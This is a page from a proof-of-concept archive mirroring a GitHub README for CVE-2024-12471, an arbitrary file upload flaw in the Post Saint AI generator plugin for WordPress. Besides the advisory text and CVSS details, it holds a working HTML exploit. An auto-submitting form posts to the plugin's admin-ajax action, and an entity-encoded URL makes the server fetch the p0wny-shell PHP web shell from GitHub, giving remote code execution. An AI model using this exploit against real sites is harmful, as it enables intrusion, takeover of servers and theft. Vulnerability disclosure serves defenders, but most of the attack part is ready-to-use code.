Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-12471 PoC — Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Missing Authoriz

Source
https://github.com/RandomRobbieBF/CVE-2024-12471
Associated Vulnerability
Title:Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload (CVE-2024-12471)
Description:The Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator plugin for WordPress is vulnerable to arbitrary files uploads due to a missing capability check and file type validation on the add_image_to_library AJAX action function in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files that make remote code execution possible.
Description
Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload
Readme
# CVE-2024-12471
Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload

# Description

The Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator plugin for WordPress is vulnerable to arbitrary files uploads due to a missing capability check and file type validation on the add_image_to_library AJAX action function in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files that make remote code execution possible.

## Details

- **Type**: plugin
- **Slug**: post-saint
- **Affected Version**: 1.3.1
- **CVSS Score**: 8.8
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-12471
- **Status**: Closed

POC
---
```
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="add&#95;image&#95;to&#95;library" />
      <input type="hidden" name="image&#95;url" value="https&#58;&#47;&#47;raw&#46;githubusercontent&#46;com&#47;flozz&#47;p0wny&#45;shell&#47;refs&#47;heads&#47;master&#47;shell&#46;php" />
      <input type="hidden" name="image&#95;prompt" value="say&#32;hello" />
      <input type="hidden" name="insert&#95;prompt&#95;media&#95;library&#95;fields" value="caption&#95;description" />
      <input type="hidden" name="image&#95;generator" value="pexels" />
      <input type="hidden" name="log&#95;id" value="1667" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
File Snapshot

 [4.0K]  /data/pocs/68092965a4f4e51d356020e68c12eaebb9e1143b
└── [1.8K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →